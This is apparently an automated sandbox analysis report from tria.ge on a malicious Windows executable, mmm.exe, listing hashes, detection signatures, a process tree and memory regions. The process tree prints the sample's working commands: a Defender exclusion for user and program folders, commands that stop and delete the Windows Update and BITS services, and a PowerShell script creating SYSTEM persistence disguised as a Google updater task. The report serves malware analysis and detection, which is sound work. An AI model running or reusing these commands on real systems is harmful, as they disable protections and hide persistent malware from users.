Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    29s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    20/10/2022, 00:36

General

  • Target

    mmm.exe

  • Size

    6.9MB

  • MD5

    c2b5692d7461c63215d8d13031094e1a

  • SHA1

    383c835bbc904152fedb7910d2028d518278d578

  • SHA256

    85569470b1bacc8146eb41de3e46cefd826a13cac3f97e5a5ca65ec14be5ec5c

  • SHA512

    b89eeff2ecec12d3243266fce3ee2dd1c766e4bbbad6067d453b65d276b6d7ef2f18116703b4546399f7430ffe49c83e526d216c4b842c3c69bd4bf0f052c14f

  • SSDEEP

    196608:MrAev3AuJzPokWeb+loYC4uzHD/N6arTdeS/4mzlWc6L:SlBPoeeSbN6and3/4cH6L

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Themida packer 9 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\mmm.exe
    "C:\Users\Admin\AppData\Local\Temp\mmm.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Drops file in Drivers directory
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1900
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1784
    • C:\Windows\system32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:796
      • C:\Windows\system32\sc.exe
        sc stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:1816
      • C:\Windows\system32\sc.exe
        sc stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:1456
      • C:\Windows\system32\sc.exe
        sc stop wuauserv
        3⤵
        • Launches sc.exe
        PID:1444
      • C:\Windows\system32\sc.exe
        sc stop bits
        3⤵
        • Launches sc.exe
        PID:856
      • C:\Windows\system32\sc.exe
        sc stop dosvc
        3⤵
        • Launches sc.exe
        PID:1708
      • C:\Windows\system32\reg.exe
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        3⤵
          PID:1988
        • C:\Windows\system32\reg.exe
          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
          3⤵
            PID:1184
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
            3⤵
            • Modifies security service
            PID:1528
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
            3⤵
              PID:832
            • C:\Windows\system32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
              3⤵
                PID:1524
            • C:\Windows\system32\cmd.exe
              cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1696
              • C:\Windows\system32\powercfg.exe
                powercfg /x -hibernate-timeout-ac 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1548
              • C:\Windows\system32\powercfg.exe
                powercfg /x -hibernate-timeout-dc 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2036
              • C:\Windows\system32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1980
              • C:\Windows\system32\powercfg.exe
                powercfg /x -standby-timeout-dc 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1964
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell <#cthbhmckn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1532
              • C:\Windows\system32\schtasks.exe
                "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                3⤵
                • Creates scheduled task(s)
                PID:2004
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell <#iljoca#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
              2⤵
                PID:1656
                • C:\Windows\system32\schtasks.exe
                  "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                  3⤵
                    PID:1592
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {D67763A8-D20C-4CA6-A9ED-80B9C1BD9889} S-1-5-18:NT AUTHORITY\System:Service:
                1⤵
                  PID:1704

                Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  afef8d0a33d2b54795d2d0571dea98a3

                  SHA1

                  80ba0e3ab59b2b04c5ed38e0c1f865f2b597d526

                  SHA256

                  07a34915211cf6b7a56a934087576b96a2972fa2567a340ffaaa6812328ad392

                  SHA512

                  c3cfa9b42a2cb80f10b94dedd7a843214829d0a1d0dd937765bc89faabf12391ef0412c6605c5c4c97223e6cddabead991b0d8167af7fddfbf8ee06c1ce83e21

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  afef8d0a33d2b54795d2d0571dea98a3

                  SHA1

                  80ba0e3ab59b2b04c5ed38e0c1f865f2b597d526

                  SHA256

                  07a34915211cf6b7a56a934087576b96a2972fa2567a340ffaaa6812328ad392

                  SHA512

                  c3cfa9b42a2cb80f10b94dedd7a843214829d0a1d0dd937765bc89faabf12391ef0412c6605c5c4c97223e6cddabead991b0d8167af7fddfbf8ee06c1ce83e21

                • memory/1532-82-0x000007FEEF1C0000-0x000007FEEFD1D000-memory.dmp

                  Filesize

                  11.4MB

                • memory/1532-95-0x0000000002444000-0x0000000002447000-memory.dmp

                  Filesize

                  12KB

                • memory/1532-86-0x0000000002444000-0x0000000002447000-memory.dmp

                  Filesize

                  12KB

                • memory/1532-89-0x000000001B750000-0x000000001BA4F000-memory.dmp

                  Filesize

                  3.0MB

                • memory/1532-80-0x000007FEF2AE0000-0x000007FEF3503000-memory.dmp

                  Filesize

                  10.1MB

                • memory/1532-97-0x000000000244B000-0x000000000246A000-memory.dmp

                  Filesize

                  124KB

                • memory/1656-104-0x000007FEF39C0000-0x000007FEF43E3000-memory.dmp

                  Filesize

                  10.1MB

                • memory/1656-105-0x000007FEF2E60000-0x000007FEF39BD000-memory.dmp

                  Filesize

                  11.4MB

                • memory/1656-106-0x0000000002394000-0x0000000002397000-memory.dmp

                  Filesize

                  12KB

                • memory/1784-67-0x000007FEF2E60000-0x000007FEF39BD000-memory.dmp

                  Filesize

                  11.4MB

                • memory/1784-69-0x00000000024A4000-0x00000000024A7000-memory.dmp

                  Filesize

                  12KB

                • memory/1784-68-0x000000001B830000-0x000000001BB2F000-memory.dmp

                  Filesize

                  3.0MB

                • memory/1784-71-0x00000000024AB000-0x00000000024CA000-memory.dmp

                  Filesize

                  124KB

                • memory/1784-66-0x000007FEF39C0000-0x000007FEF43E3000-memory.dmp

                  Filesize

                  10.1MB

                • memory/1784-70-0x00000000024A4000-0x00000000024A7000-memory.dmp

                  Filesize

                  12KB

                • memory/1784-64-0x000007FEFBEE1000-0x000007FEFBEE3000-memory.dmp

                  Filesize

                  8KB

                • memory/1900-59-0x000000013F4F0000-0x0000000140189000-memory.dmp

                  Filesize

                  12.6MB

                • memory/1900-61-0x000000013F4F0000-0x0000000140189000-memory.dmp

                  Filesize

                  12.6MB

                • memory/1900-60-0x000000013F4F0000-0x0000000140189000-memory.dmp

                  Filesize

                  12.6MB

                • memory/1900-54-0x000000013F4F0000-0x0000000140189000-memory.dmp

                  Filesize

                  12.6MB

                • memory/1900-58-0x000000013F4F0000-0x0000000140189000-memory.dmp

                  Filesize

                  12.6MB

                • memory/1900-62-0x000000013F4F0000-0x0000000140189000-memory.dmp

                  Filesize

                  12.6MB

                • memory/1900-57-0x000000013F4F0000-0x0000000140189000-memory.dmp

                  Filesize

                  12.6MB

                • memory/1900-65-0x0000000077660000-0x0000000077809000-memory.dmp

                  Filesize

                  1.7MB

                • memory/1900-55-0x000000013F4F0000-0x0000000140189000-memory.dmp

                  Filesize

                  12.6MB

                • memory/1900-56-0x0000000077660000-0x0000000077809000-memory.dmp

                  Filesize

                  1.7MB

                • memory/1900-102-0x000000013F4F0000-0x0000000140189000-memory.dmp

                  Filesize

                  12.6MB

                • memory/1900-103-0x0000000077660000-0x0000000077809000-memory.dmp

                  Filesize

                  1.7MB